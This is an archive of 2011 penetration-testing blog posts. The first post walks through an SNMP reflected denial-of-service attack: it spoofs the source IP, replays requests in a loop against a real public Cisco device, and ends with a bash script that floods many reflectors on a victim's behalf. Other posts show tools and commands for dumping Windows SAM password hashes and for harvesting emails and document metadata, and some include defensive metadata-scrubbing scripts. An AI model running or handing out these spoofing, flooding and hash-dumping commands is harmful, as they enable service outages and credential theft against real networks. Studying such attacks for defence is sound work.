Anestis Bechtsoudis » pen-test (http://bechtsoudis.com)

SNMP Reflected Denial of Service
http://bechtsoudis.com/2011/08/28/snmp-reflected-denial-of-service/ | Sat, 27 Aug 2011 21:04:17 +0000

Recently I conducted a network penetration test on behalf of an academic institution. Apart from the security holes I discovered, I noticed that many running SNMP services had their community strings publicly accessible. For monitoring purposes, network devices such as routers, switches, printers and VoIP devices have their read-only community strings enabled. Because the public community is read-only, many network and system administrators may assume that it is pointless to go to the trouble of securing it with ACLs or firewall rules, leaving it accessible from any source IP. But is it really pointless?

What about 0-day bugs and exploits in the running SNMP services? I have to admit that this is a rare scenario, although not impossible, especially for network devices where OS updates are infrequent or nonexistent.

But the real security hazard lies in the SNMP protocol implementation itself. In a common SNMPv1/v2c transaction, the client sends an SNMP request with the relevant OID and the SNMP server replies with the corresponding data. SNMP is a connectionless, UDP-based protocol, which makes it extremely vulnerable to IP spoofing: somebody can capture a legitimate SNMP request, replace the source IP with another address and resend the request to the SNMP server on behalf of that address. The response packet will then be delivered to the spoofed IP address.

Let us assume the following scenario:
I want to conduct a DDoS attack against the main server of my former company. I have scanned large subnets and found open SNMP services (mostly routers, switches and network printers) whose public communities are known. I then craft a large number of SNMP request packets with the victim server's IP address as the source and the list of public SNMP services as the destination addresses. The packet generator runs in loops, creating a flood of SNMP requests on behalf of the victim machine. All the SNMP responses, payload included, are delivered to the victim server, causing congestion and exhausting its resources.

The above scenario is the so-called "SNMP Reflected Denial of Service". Of course some ISPs, enterprise border routers and firewalls have mechanisms to prevent IP spoofing, although there are techniques to bypass them that are beyond the scope of this article.

To demonstrate how easy spoofed packet generation is, I will walk through the whole procedure in detail using the relevant tools.

 

First of all, let's find a publicly accessible SNMP service. When we talk about SNMP, the first thing that comes to my mind is a Cisco device. The trivial method of discovering an open service is to scan large subnets with the relevant network scanning tools. I will use a different approach and search text dump sites with pastenum. Giving some Cisco configuration strings as input to pastenum, the first result led me to the Cisco device at 173.165.68.49.

Now that we have a public community, let's set up the test network as shown in the following image:

192.168.2.4 is the attacker’s machine.
192.168.2.5 is a test machine in which we will test our scenario before attacking the victim.
192.168.2.7 is the victim server.

Let's now create a simple SNMP request using the snmpwalk tool, while in parallel capturing the traffic with tcpdump.

root@192.168.2.4:~# snmpwalk -v 2c -c public 173.165.68.49 1.3.6.1
SNMPv2-MIB::sysDescr.0 = STRING: Cisco IOS Software, C2600 Software (C2600-ADVENTERPRISEK9-M), Version 12.4(17), RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2007 by Cisco Systems, Inc.
Compiled Fri 07-Sep-07 16:05 by prod_rel_team
root@192.168.2.4:~# tcpdump -nnvvSX -s 0 -i wlan0 -w capture.pcap
tcpdump: listening on wlan0, link-type EN10MB (Ethernet), capture size 65535 bytes 
 
36 packets received by filter
0 packets dropped by kernel

Using Wireshark we can take a deeper look into the capture file and, more specifically, at the SNMP request.

Now that we have studied the format of the SNMP request packet, let's isolate the first SNMP request (packet number 7) using the editcap tool.

root@192.168.2.4:~# editcap -r capture.pcap snmp_req.pcap 7
Add_Selected: 7
Not inclusive ... 7
root@192.168.2.4:~# tcpdump -nnvvSX -r snmp_req.pcap
reading from file snmp_req.pcap, link-type EN10MB (Ethernet)
21:26:47.371943 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 66)
    192.168.2.4.52717 > 173.165.68.49.161: [udp sum ok]  { SNMPv2c { GetNextRequest(23) R=184115647  .1.3.6.1 } }
	0x0000:  4500 0042 0000 4000 4011 8628 c0a8 0204  E..B..@.@..(....
	0x0010:  ada5 4431 cded 00a1 002e 0876 3024 0201  ..D1.......v0$..
	0x0020:  0104 0670 7562 6c69 63a1 1702 040a f961  ...public......a
	0x0030:  bf02 0100 0201 0030 0930 0706 032b 0601  .......0.0...+..
	0x0040:  0500                                     ..

The next step is to change the packet's source IP address using the bittwiste packet editor, which is part of the bittwist project. I will alter the source IP address from 192.168.2.4 to 192.168.2.5, another PC in the subnet to which we have access. The bittwiste tool automatically recalculates the checksums. If you want more details about the tool, refer to the official documentation.

root@192.168.2.4:~# bittwiste -I snmp_req.pcap -O spoofed_snmp_req.pcap -T ip -p 17 -s 192.168.2.5
input file: snmp_req.pcap
output file: spoofed_snmp_req.pcap
 
1 packets (80 bytes) written
root@192.168.2.4:~# tcpdump -nnvvSX -r spoofed_snmp_req.pcap
reading from file spoofed_snmp_req.pcap, link-type EN10MB (Ethernet)
21:26:47.371943 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 66)
    192.168.2.5.52717 > 173.165.68.49.161: [udp sum ok]  { SNMPv2c { GetNextRequest(23) R=184115647  .1.3.6.1 } }
	0x0000:  4500 0042 0000 4000 4011 8627 c0a8 0205  E..B..@.@..'....
	0x0010:  ada5 4431 cded 00a1 002e 0875 3024 0201  ..D1.......u0$..
	0x0020:  0104 0670 7562 6c69 63a1 1702 040a f961  ...public......a
	0x0030:  bf02 0100 0201 0030 0930 0706 032b 0601  .......0.0...+..
	0x0040:  0500

Now we need to send the new request with the spoofed IP using a packet generator; I chose the bittwist tool. To confirm that the response to the request reaches the spoofed source, I will launch a tcpdump capture on the 192.168.2.5 machine.

First I use the -d option of bittwist to list the available interfaces, and then I use the wlan0 device to send the spoofed packet.

root@192.168.2.4:~# bittwist -d
1. eth0
2. wlan0
3. usbmon1 (USB bus number 1)
4. usbmon2 (USB bus number 2)
5. usbmon3 (USB bus number 3)
6. usbmon4 (USB bus number 4)
7. usbmon5 (USB bus number 5)
8. usbmon6 (USB bus number 6)
9. usbmon7 (USB bus number 7)
10. vmnet8
11. usbmon8 (USB bus number 8)
12. any (Pseudo-device that captures on all interfaces)
13. lo
root@192.168.2.4:~# bittwist -i 2 spoofed_snmp_req.pcap
sending packets through wlan0
trace file: spoofed_snmp_req.pcap
 
1 packets (80 bytes) sent
Elapsed time = 0.000143 seconds
root@192.168.2.5:~# tcpdump -nnvvSX -s 0 -i eth0 -w capture.pcap
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
 
19 packets received by filter
0 packets dropped by kernel
root@192.168.2.5:~#
root@192.168.2.5:~# tcpdump -nnvvSX -r capture.pcap | grep SNMP
reading from file capture.pcap, link-type EN10MB (Ethernet)
22:15:20.295633 IP (tos 0x38, ttl 238, id 56597, offset 0, flags [none], proto UDP (17), length 330) 173.165.68.49.161 > 192.168.2.5.52717: [udp sum ok]  { SNMPv2c { GetResponse(283) R=184115647  .1.3.6.1.2.1.1.1.0="Cisco IOS Software, C2600 Software (C2600-ADVENTERPRISEK9-M), Version 12.4(17), RELEASE SOFTWARE (fc1)^M^JTechnical Support: http://www.cisco.com/techsupport^M^JCopyright (c) 1986-2007 by Cisco Systems, Inc.^M^JCompiled Fri 07-Sep-07 16:05 by prod_rel_team" } }

 

Knowing that our scenario works, it is time to launch the actual attack against the target machine. We again use the bittwiste editor to change the source to 192.168.2.7, the victim's IP address.

root@192.168.2.4:~# bittwiste -I snmp_req.pcap -O spoofed2_snmp_req.pcap -T ip -p 17 -s 192.168.2.7
input file: snmp_req.pcap
output file: spoofed2_snmp_req.pcap
 
1 packets (80 bytes) written

In order to see the bandwidth impact, I will not send only one packet as in the previous attempt; instead I will use the infinite-loop flag of the bittwist packet generator.

root@192.168.2.4:~# bittwist -i 2 spoofed2_snmp_req.pcap -l 0
trace file: spoofed2_snmp_req.pcap
trace file: spoofed2_snmp_req.pcap
...
 
2061710 packets (164936800 bytes) sent
Elapsed time = 140.923743 seconds

I used the simple bandwidthd monitoring tool to measure the bandwidth load. From the following graph it is pretty obvious that ~2M packets from only one source caused a measurable load on the victim machine: we reached a peak of ~40 KB/sec, while normal UDP traffic stays below 4 KB/sec.
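If bandwidthd is not available, a rough rate check can be improvised on the victim with standard tools. A minimal sketch, assuming the victim listens on eth0 and has the coreutils timeout command installed:

# count SNMP responses (UDP source port 161) hitting the victim over 10 seconds
timeout 10 tcpdump -i eth0 -nn -q 'udp and src port 161' 2>/dev/null | wc -l

Note also the amplification factor: the replayed request frame is 80 bytes, while the reflected response captured earlier is a 330-byte datagram, so every reflected packet roughly quadruples the bandwidth the attacker spends.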

Apart from the network load shown above, an attacker can also cause service load. This can be done by changing the SNMP request's source port to one of the victim's open UDP ports, so that the reflected responses are delivered straight to a listening service. The resulting load on that service can bring the machine to its knees.
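A sketch of that variation with bittwiste, under the assumption that its UDP-layer options (-T udp with -s/-d for source/destination port) behave like the IP-layer options used above; port 53 is just an illustrative stand-in for whatever UDP service the victim exposes:

# rewrite the source address to the victim and the source port to an open victim port
bittwiste -I snmp_req.pcap -O spoofed3_snmp_req.pcap -T ip -s 192.168.2.7
bittwiste -I spoofed3_snmp_req.pcap -O spoofed3_final.pcap -T udp -s 53
# replay the result in an infinite loop, as before
bittwist -i 2 spoofed3_final.pcap -l 0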

 

Conclusions:

It is pretty obvious from the above that publicly accessible SNMP services can impose significant load on victim servers. Attackers can launch DDoS attacks without needing to control large botnets; a few hosts running packet generation scripts are enough to conduct an effective reflected DDoS attack.
So far I have not run this attack scenario in a large-scale environment, so I cannot include more detailed results on SNMP reflected DDoS, although it is in my future plans to conduct such research.
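For reference, a packet generation script of that kind can be as small as the following sketch, which just repeats the bittwiste/bittwist steps from this article for every reflector in a list. The reflectors.txt file and the victim address are illustrative placeholders, and it assumes bittwiste's -d option rewrites the destination IP the same way -s rewrites the source.

#!/bin/bash
# sketch: spoofed SNMP request generation against a list of reflectors
VICTIM=192.168.2.7                 # address that will receive the reflected responses
i=0
while read -r reflector; do
  # rewrite source (victim) and destination (reflector) of the captured request
  bittwiste -I snmp_req.pcap -O req_$i.pcap -T ip -s "$VICTIM" -d "$reflector"
  bittwist -i 2 req_$i.pcap -l 0 &  # replay each spoofed request in an infinite loop
  i=$((i+1))
done < reflectors.txt
wait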

 

PS: If you have come across related research, I would appreciate an email with the sources.

 

DISCLAIMER: I'm not responsible for what you do with this information. It is provided for educational purposes only.

 

 

A. Bechtsoudis

Pastenum: Enumerating Text Dump Websites
http://bechtsoudis.com/2011/06/08/pastenum-enumerating-text-dump-websites/ | Wed, 08 Jun 2011 16:24:49 +0000

Text dump websites are used by programmers and system administrators to share and store pieces of source code and configuration information. Two of the most popular text dump websites are pastebin and pastie. Day by day, more programmers, amateur system administrators and regular users are captivated by the attractive features of these web tools and use them to share large amounts of configuration and source code information. Therefore, as on every popular web platform, sensitive information sharing is inevitable. Potential attackers use these platforms to gather information about their targets, while penetration testers search these sites to prevent critical information leakage.

 

Most text dump platforms offer a search mechanism, so anyone can manually query them for matching strings. However, an automated script/tool capable of querying all these text dump websites and generating an overall search report would be very useful in the reconnaissance phase of a penetration test. Pen-testers can use such an automated tool to efficiently search for leaked configuration and login credential information that would help an attacker profile the victim system and find a security hole.

Recently I came across such a script on the web: pastenum. Pastenum is a Ruby script written by Nullthreat, a member of the Corelan Team. It can query pastebin, pastie and github for user-defined strings and generate an overall HTML report with the search results.

 

Pastenum can be downloaded from here, while detailed installation information can be found here.

 

Let’s see some screenshots with pastenum in action.

A. Bechtsoudis

Gathering & Retrieving Windows Password Hashes
http://bechtsoudis.com/2011/06/04/gathering-retrieving-windows-password-hashes/ | Sat, 04 Jun 2011 12:11:55 +0000

Penetration tests might involve Windows user password auditing. In Windows systems (NT, 2000, XP, Vista, 7), user password hashes (LM and NTLM hashes) are stored in a registry hive named SAM (Security Accounts Manager). Until recently, whenever I had to extract Windows password hashes I had two alternatives: the manual way, or Windows password auditing suites (Cain & Abel, Ophcrack, L0phtCrack etc.). But yesterday I came across a very useful Python script named HashGrab2. HashGrab2 automatically mounts Windows drives and extracts username/password-hash pairs from the SAM and SYSTEM files located on those drives, using the samdump2 utility. HashGrab2 is ideal when you just want to collect the Windows password hashes in order to import them into your preferred password cracker.

 

SAM Database Protection:

Offline Attacks: Microsoft introduced the SYSKEY utility to partially encrypt the on-disk copy of the SAM file. Information about the SYSKEY encryption key is stored in the SYSTEM file located under %SystemRoot%\System32\config\.

Online Attacks: The SAM file cannot be moved or copied while Windows is running, since the Windows kernel holds an exclusive filesystem lock on it and will not release that lock until the operating system has shut down or a blue screen exception has been thrown. However, the in-memory copy of the SAM contents can be dumped using various techniques, making the password hashes available for offline brute-force attacks.

 

HashGrab2:

HashGrab2, written by s3my0n, is an offline gathering Python script that automatically discovers Windows drives and extracts the username/hash pairs to a user-defined file. HashGrab2 must be run as root (in order to mount the Windows drives) and requires Python. It is preferable to install samdump2 from your distribution's repositories so that the username/hash pairs are acquired automatically.

 

HashGrab2 can be downloaded from here.
zip md5sum:0db4f35062d773001669554c8e16015a
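For comparison, the manual procedure that HashGrab2 automates looks roughly like the sketch below. It assumes the Windows system partition is /dev/sda1, that the hive paths follow the usual XP-style layout (case may differ between installations), and that the older bkhive/samdump2 pair is available; newer samdump2 releases can take the SYSTEM and SAM hives directly.

# mount the Windows partition read-only and copy the two registry hives
mkdir -p /mnt/win
mount -o ro /dev/sda1 /mnt/win
cp /mnt/win/WINDOWS/system32/config/SAM /mnt/win/WINDOWS/system32/config/system /tmp/
# recover the SYSKEY boot key, then dump the LM/NTLM hashes
bkhive /tmp/system /tmp/syskey.txt
samdump2 /tmp/SAM /tmp/syskey.txt > /tmp/hashes.txt
umount /mnt/win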

 

user1@bt5:Scripts$ ./hashgrab2.py 
 
  _               _                     _    ___  
 | |             | |                   | |  |__ \ 
 | |__   __ _ ___| |__   __ _ _ __ __ _| |__   ) |
 | '_ \ / _` / __| '_ \ / _` | '__/ _` | '_ \ / / 
 | | | | (_| \__ \ | | | (_| | | | (_| | |_) / /_ 
 |_| |_|\__,_|___/_| |_|\__, |_|  \__,_|_.__/____|
                         __/ |                    
                        |___/
 
 HashGrab v2.0 by s3my0n
 http://InterN0T.net
 Contact: RuSH4ck3R[at]gmail[dot]com
 
 [-] Error: you are not root

 

root@bt5:Scripts$./hashgrab2.py 
 
  _               _                     _    ___  
 | |             | |                   | |  |__ \ 
 | |__   __ _ ___| |__   __ _ _ __ __ _| |__   ) |
 | '_ \ / _` / __| '_ \ / _` | '__/ _` | '_ \ / / 
 | | | | (_| \__ \ | | | (_| | | | (_| | |_) / /_ 
 |_| |_|\__,_|___/_| |_|\__, |_|  \__,_|_.__/____|
                         __/ |                    
                        |___/
 
 HashGrab v2.0 by s3my0n
 http://InterN0T.net
 Contact: RuSH4ck3R[at]gmail[dot]com
 
 [*] Mounted /dev/sda1 to /mnt/qWLgG5
 
 [*] Mounted /dev/sda2 to /mnt/4sDAQO
 
 [*] Copying SAM and SYSTEM files...
 
samdump2 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it
 
Root Key : CMI-CreateHive{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}
 
 [*] Unmounting partitions...
 
 [*] Deleting mount directories...
 
 [*] Deleting ['./4sDAQO']

 

root@bt5:Applications$cat 4sDAQO.txt 
Administrator:500:HASH:::
Guest:501:HASH:::
user1:1001:HASH:::

 
 

DISCLAIMER: I'm not responsible for what you do with this information. It is provided for educational purposes only.

 
 

A. Bechtsoudis

Enumerating Metadata: Part3 odf files
http://bechtsoudis.com/2011/05/12/enumerating-metadata-part3-odf-files/ | Thu, 12 May 2011 15:44:04 +0000

In the third part of the Enumerating Metadata series, we will talk about the Open Document Format (ODF), supported by popular document software suites (OpenOffice, LibreOffice, Microsoft Office 2007 and more). ODF is a family of XML-based file formats used to represent new-age electronic documents (spreadsheets, presentations, word-processing documents etc.). A standard ODF file is a ZIP-compressed archive containing the appropriate files and directories. The document metadata is stored in a separate XML file named meta.xml. The metadata contained in this file can comprise pre-defined metadata, user-defined metadata, as well as custom metadata (such as ODF version, Title, Description and more).

The most common filename extensions used for OpenDocument documents are:

  • .odt for word processing (text) documents
  • .ods for spreadsheets
  • .odp for presentations
  • .odb for databases
  • .odg for graphics
  • .odf for formulae, mathematical equations

A packaged ODF file will contain, at a minimum, six files and two directories archived into a modified ZIP file. The structure of the basic package is as follows:

|-- META-INF
|   `-- manifest.xml
|-- Thumbnails
|   `-- thumbnail.png
|-- content.xml
|-- meta.xml
|-- mimetype
|-- settings.xml
`-- styles.xml
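Since the package is just a ZIP archive, the metadata can be inspected without ever opening the document. A quick check from the command line (xmllint is optional and only used for pretty-printing; the file name is illustrative):

# print the raw metadata of an ODF document straight from the archive
unzip -p document.odt meta.xml | xmllint --format -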

 

Important! Even if you encrypt your document with a protection password, the meta.xml file is not encrypted and is readable by anyone who does not know the document password. So be careful: password protection does not solve the metadata problem.

 

We can see that ODF metadata contains a large amount of usable information profiling the editors and their software tools. An attacker can gather this kind of information and use it as a starting point for exploitation attacks. So it is important for document users to control the information leakage emanating from hidden metadata.

Document software suites such as OpenOffice and LibreOffice offer editing options for the metadata fields (usually under File->Properties). You can use this feature to edit or clean the desired fields. The problem is that this method works per file, so if you have a large database of ODF documents to handle, you obviously need an automated tool/script. Because ODF files are ZIP containers, the solution is pretty easy: you can mass-delete or mass-update the meta.xml files using the zip tool and its delete/update options. If you delete meta.xml from a document, be careful: the next time the document is saved by the relevant software, the XML file is recreated with the software's predefined values for the metadata fields.

I usually do not want any metadata leakage from my documents, so I delete the meta.xml file from the document container. I wrote a simple bash script which deletes all meta.xml files from the ODF documents under a user-specified directory:

#!/bin/bash
 
#============================================================#
# Author     : Anestis Bechtsoudis                           #
# Date       : 12 May 2011                                   #
# Description: Bash script that removes metadata (meta.xml)  #
# from ODF (Open Document Format) files used from OpenOffice #
#============================================================#
 
SAVEIFS=$IFS
IFS=$(echo -en "\n\b")
 
if [ $# -ne 1 ] ; then
  echo "Usage: $0 [dir]"
  echo -e "\t[dir]: Directory containing ODF Files"
  exit
fi
 
#===============================================#
# Open Document format supports:                #
#    .odt for word processing (text) documents  #
#    .ods for spreadsheets                      #
#    .odp for presentations                     #
#    .odb for databases                         #
#    .odg for graphics                          #
#    .odf for formulae, mathematical equations  #
#                                               #
# Remove unwanted filetypes                     #
#===============================================#
FILETYPES='\.(odt|ods|odp|odb|odg|odf)$'
 
# Temp file for search results
TMPFILE=/tmp/$(basename "$0").tmp
 
find "$1" -type f | egrep "$FILETYPES" > "$TMPFILE"
 
while read line
do
  zip -d "$line" meta.xml
done < $TMPFILE
 
rm $TMPFILE
 
IFS=$SAVEIFS

If you do not want to completely remove the meta.xml files, you can write a basic meta.xml template and alter the above script to update (instead of delete) the meta.xml in each ODF document. The update can be done using the -f argument of the zip tool.
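A minimal sketch of that update approach, assuming you keep a sanitized template next to the documents (file names here are illustrative):

# overwrite the archive's meta.xml entry with a sanitized template
cp clean-meta.xml meta.xml
zip -f document.odt meta.xml   # -f freshens the existing meta.xml entry inside the archive
rm meta.xml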

The above approach can be adapted to Windows by writing the equivalent batch files.
 

Useful sources:

 

 

A. Bechtsoudis

Knowing is half the battle…
http://bechtsoudis.com/2011/05/10/knowing-is-half-the-battle%e2%80%a6/ | Tue, 10 May 2011 19:46:43 +0000

G.I. Joe used to say, "Knowing is half the battle." The collection of prior information can make the difference between success and failure of a penetration test.

The first phase of a penetration test (the reconnaissance phase) includes information gathering and network mapping. Automated, intelligent reconnaissance tools have been developed extensively in recent years, offering a reliable running start for the exploitation phase. In this article I will focus on information gathering tools used to collect valid login names, emails, DNS records and WHOIS data. A penetration tester can use the gathered information to profile the target, launch client-side attacks, search social networks for additional knowledge, brute-force authentication mechanisms, etc.

We can easily gather this information with simple scripts, without following an extensive OSINT (Open Source Intelligence) procedure. I should mention, though, that a detailed and extensive OSINT phase will yield better results and will be necessary under certain business needs.

I will analyze Edge-Security’s theHarvester and Metasploit’s Search Email Collector tools.

 

theHarvester

theHarvester (currently at version 2.0) is a Python script that can gather email accounts, usernames and subdomains from public search engines and PGP key servers.

The tool supports the following sources:

  • Google – emails, subdomains/hostnames
  • Google profiles – employee names
  • Bing search – emails, subdomains/hostnames, virtual hosts (requires a Bing API key)
  • PGP servers – emails, subdomains/hostnames
  • LinkedIn – employee names
  • Exalead – emails, subdomains/hostnames

The latest version of theHarvester can be downloaded from the GitHub repository here.

Give execute permissions to the script file, and run it in order to see the available options.

$ ./theHarvester.py 
 
*************************************
*TheHarvester Ver. 2.0 (reborn)     *
*Coded by Christian Martorella      *
*Edge-Security Research             *
*cmartorella@edge-security.com      *
*************************************
 
Usage: theharvester options 
 
       -d: Domain to search or company name
       -b: Data source (google,bing,bingapi,pgp,linkedin,google-profiles,exalead,all)
       -s: Start in result number X (default 0)
       -v: Verify host name via dns resolution and search for vhosts(basic)
       -l: Limit the number of results to work with(bing goes from 50 to 50 results,
            google 100 to 100, and pgp does not use this option)
       -f: Save the results into an XML file
 
Examples:./theharvester.py -d microsoft.com -l 500 -b google
         ./theharvester.py -d microsoft.com -b pgp
         ./theharvester.py -d microsoft -l 200 -b linkedin

You can see some execution examples in the following screenshots:

 

 

Metasploit Email Collector

Search Email Collector is a Metasploit auxiliary module written by Carlos Perez. The module runs inside the Metasploit Framework and uses Google, Bing and Yahoo to build a list of valid email addresses for the target domain.

You can view the source code here.

The module options are:

DOMAIN        – The domain name to locate email addresses for
OUTFILE       – A filename to store the generated email list
SEARCH_BING   – Enable Bing as a backend search engine (default: true)
SEARCH_GOOGLE – Enable Google as a backend search engine (default: true)
SEARCH_YAHOO  – Enable Yahoo! as a backend search engine (default: true)
PROXY         – Proxy server to route the connection, <host>:<port>
PROXY_PASS    – Proxy server password
PROXY_USER    – Proxy server user
WORKSPACE     – Specify the workspace for this module

 

Let’s see a running example:

msf > 
msf > use auxiliary/gather/search_email_collector 
msf auxiliary(search_email_collector) > set DOMAIN example.com
DOMAIN => example.com
msf auxiliary(search_email_collector) > run
 
[*] Harvesting emails .....
[*] Searching Google for email addresses from example.com
[*] Extracting emails from Google search results...
[*] Searching Bing email addresses from example.com
[*] Extracting emails from Bing search results...
[*] Searching Yahoo for email addresses from example.com
[*] Extracting emails from Yahoo search results...
[*] Located 49 email addresses for example.com
[*] 	555-555-0199@example.com
[*] 	a@example.com
[*] 	alle@example.com
[*] 	b@example.com
[*] 	boer_faders@example.com
[*] 	ceo@example.com
[*] 	defaultemail@example.com
[*] 	email@example.com
[*] 	example@example.com
[*] 	foo@example.com
[*] 	fsmythe@example.com
[*] 	info@example.com
[*] 	joe@example.com
[*] 	joesmith@example.com
[*] 	johnnie@example.com
[*] 	johnsmith@example.com
[*] 	myname+spam@example.com
[*] 	myname@example.com
[*] 	name@example.com
[*] 	nobody@example.com
....
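The same module can also be driven non-interactively, which is handy for scripting. A sketch using msfconsole's -x option (the domain and output file are placeholders):

msfconsole -q -x "use auxiliary/gather/search_email_collector; set DOMAIN example.com; set OUTFILE emails.txt; run; exit"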

 

Useful links:

 

DISCLAIMER: I'm not responsible for what you do with this information. It is provided for educational purposes only.

 

 

A. Bechtsoudis

Enumerating Metadata: Part2 pdf files
http://bechtsoudis.com/2011/05/03/enumerating-metadata-part2-pdf-files/ | Tue, 03 May 2011 00:26:57 +0000

In my article Gathering & Analyzing Metadata Information I emphasized the security risk posed by the hidden metadata of publicly shared documents and how this information can be gathered en masse with certain tools. So I began writing a series of articles analyzing the different types of file metadata and the tools one can use to view and edit/remove them. In the first part I analyzed exif JPEG metadata, and in this article I will continue with the famous Portable Document Format (PDF), presenting the appropriate tools for handling its metadata.

We all use PDF files for professional or personal document sharing. PDF metadata is usually populated by PDF-converting applications and might expose undesirable information to third parties. Especially since the adoption of XMP in PDF metadata (from version 1.6 onwards), the number of available hidden information fields has increased. Adobe Acrobat Pro offers an extended editor for the metadata fields, but Adobe Reader and many other editors and converters do not. Some of the metadata fields are:

    • AdHocReviewCycleID
    • Appligent
    • Author
    • AuthorEmail
    • AuthorEmailDisplayName
    • Company
    • CreationDate
    • Creator
    • EmailSubject
    • Keywords
    • ModDate
    • PreviousAdHocReviewCycleID
    • Producer
    • PTEX.Fullbanner
    • SourceModified
    • Subject
    • Title

There are a lot of tools that can extract/edit/remove PDF metadata, but I prefer open source tools, so I will analyze the use of the PDF Toolkit (pdftk) under a Linux environment. pdftk does not require Acrobat and runs under Windows, Linux, Mac OS X, FreeBSD and Solaris. PDF Toolkit has many features, but in this article I will cover only those needed for metadata manipulation.

Initially you will have to install pdftk using your distribution’s package manager or by compiling the sources.

In order to extract metadata information from a pdf file you can use the dump_data option as follows:

$pdftk file.pdf dump_data
InfoKey: Creator
InfoValue: PScript5.dll Version 5.2.2
InfoKey: Title
InfoValue: Microsoft Word - Ergastiriaki_Askisi_2011.doc
InfoKey: Author
InfoValue: Administrator
InfoKey: Producer
InfoValue: GPL Ghostscript 8.15
InfoKey: ModDate
InfoValue: D:20110406122119
InfoKey: CreationDate
InfoValue: D:20110406122119
PdfID0: bb8f9ac70cc66e8cabecb4144806f
PdfID1: bb8f9ac70cc66e8cabecb4144806f
NumberOfPages: 3

In order to edit metadata fields you have to extract metadata into a file, edit the desired values in the file and then update the pdf by importing the edited metadata file.

To extract the metadata to a file, use the output option:

$pdftk file.pdf dump_data output pdf-metadata

Using your preferred text editor, you can edit the pdf-metadata InfoValues (I prefer to leave every field blank). Then you can update the initial file using the edited metadata file.

$pdftk file.pdf update_info pdf-metadata output no-metadata.pdf

To automate the above steps, I have written a simple script that works on a whole directory of PDF files:

#!/bin/bash
SAVEIFS=$IFS
IFS=$(echo -en "\n\b")
 
if [ $# -ne 2 ] ; then
        echo "Usage: $0 [dir] [metafile]"
        echo -e "\t[dir]"
        echo -e "\t\tDirectory with pdf files"
        echo -e "\t[metafile]"
        echo -e "\t\tFile containing desired metadata"
        exit
fi
 
PDFTK="/usr/bin/pdftk"
SOURCEDIR="$1"
METAFILE="$2"
PDFTMPFILE="/tmp/temp.pdf"
 
for i in $( find $SOURCEDIR -type f -name "*.pdf" ); do
  cp $i $PDFTMPFILE
  $PDFTK $PDFTMPFILE update_info $METAFILE output $i
  rm $PDFTMPFILE
done
 
IFS=$SAVEIFS

And here is a clean metadata file that you can use:

InfoKey: Author
InfoValue:
InfoKey: Company
InfoValue:
InfoKey: CreationDate
InfoValue:
InfoKey: Creator
InfoValue:
InfoKey: ModDate
InfoValue:
InfoKey: Producer
InfoValue:
InfoKey: SourceModified
InfoValue:
InfoKey: Title
InfoValue:

 

 

A. Bechtsoudis

Gathering & Analyzing Metadata Information
http://bechtsoudis.com/2011/05/02/gathering-analyzing-metadata-information/ | Sun, 01 May 2011 23:14:55 +0000

Any organization or individual who sends or receives files (documents, spreadsheets, images etc.) electronically needs to be aware of the dangers of hidden metadata. Metadata can include user names, path and system information (such as directories on your hard drive or network shares), software versions, and more. This data can be used for a brute-force attack, for social engineering, or for finding pockets of critical data once inside a compromised network. Thwarting an attacker's attempts to exploit the metadata easily found on your company's or personal website, in digital documents, and in search-engine caches is hard, if not nearly impossible.

Mass metadata gathering can be accomplished pretty easily using search engines and their caching features. In this article I will present the use of MetaGoofil & FOCA, two free metadata gathering and analysis tools. Using these kinds of tools, an attacker can gather large amounts of crucial information about a potential target organization or individual. On the other hand, an IT security administrator can use the same tools to locate the organization's metadata leakage and prevent it or reduce it to a safe level.

 

FOCA

FOCA (Fingerprinting an Organization with Collected Archives), developed by Informatica64, is one of the most popular pen-testing tools for automated gathering and extraction of file metadata. FOCA supports all the common document extensions (doc, docx, ppt, pptx, pdf, xls, xlsx, ppsx, etc.). FOCA runs on Windows and you can download a free version from here. There is also a commercial version available.

FOCA is a pretty powerful tool with a lot of options, but in this article I want to show how someone would use its basic feature set to search a domain for documents containing metadata. To do this you first need to download and install FOCA and create a new project from the File menu. The project has to be centered on a particular target domain. Once the project is created, FOCA uses a list of search engines to search the domain for file types known to contain usable metadata.

 

Here are some screenshots of FOCA in action on a Windows 7 machine.

 

 

MetaGoofil

Metagoofil is an information gathering tool that can extract metadata from public documents (pdf, doc, xls, ppt, odp, ods) available on target websites. It can download all the public documents published on the target website and create an HTML report page that includes all the extracted metadata. At the end of the report, all the potential usernames and disclosed paths recorded in the gathered metadata are listed. Using the list of potential usernames, an attacker can prepare a brute-force attack on running services (ftp, ssh, pop3, vpn etc.), and from the disclosed paths can make guesses about the OS, network names, shared resources and so on.

Metagoofil uses the Google search engine to find documents published on the target website, e.g. site:example.com filetype:pdf. After locating the file URLs, it downloads the files into a local directory and extracts the hidden metadata using libextractor. Metagoofil is written in Python and can run on any OS that satisfies the libextractor dependency. Depending on your OS, you must edit the script and provide the correct path to the extract binary.

You can download metagoofil from the official site, although Google has changed the format of its search queries and the 1.4b version needs some alterations. For more information, take a look at the unofficial fix.

Let's see Metagoofil in action on a Linux OS.

 

 

It is pretty obvious that metadata gathering and extraction is easily accomplished. Recognizing the high security risk of hidden metadata leakage, I began writing a series of articles about the metadata included in different file types. I recently published the first part, about exif JPEG metadata, and I will continue with details and tools for other types too.

 

DISCLAIMER: I'm not responsible for what you do with this information. It is provided for educational purposes only.

 

 

A. Bechtsoudis

DRIL: Domain Reverse IP Lookup Tool
http://bechtsoudis.com/2011/04/10/dril-domain-reverse-ip-lookup-tool/ | Sun, 10 Apr 2011 18:37:06 +0000

A reverse DNS lookup reveals the domain names associated with an IP address. Website owners/maintainers who share hosting resources, as well as penetration testers, make extensive use of reverse DNS lookups to find out which domain names are hosted on a target host. A lot of online lookup tools exist (like ip-address.com and domaintools.com), but I prefer to use a dedicated software tool for this job. Recently I came across the DRIL tool on the web.

DRIL is a reverse domain lookup tool developed by Treasure Priyamal in the Java programming language, using a Bing API key. DRIL comes with a user-friendly GUI that helps pen-testers and website maintainers work quickly and efficiently. I have successfully run DRIL under Linux and under Windows XP and 7.

 

You can download the latest version of DRIL from Sourceforge.

 

In order to run DRIL in a Linux environment execute:

$ java -jar DomainReverseIPLookup.jar

 

Here are some screenshots of the tool in action:

 

 

Useful links:

 

 

 

 

A. Bechtsoudis

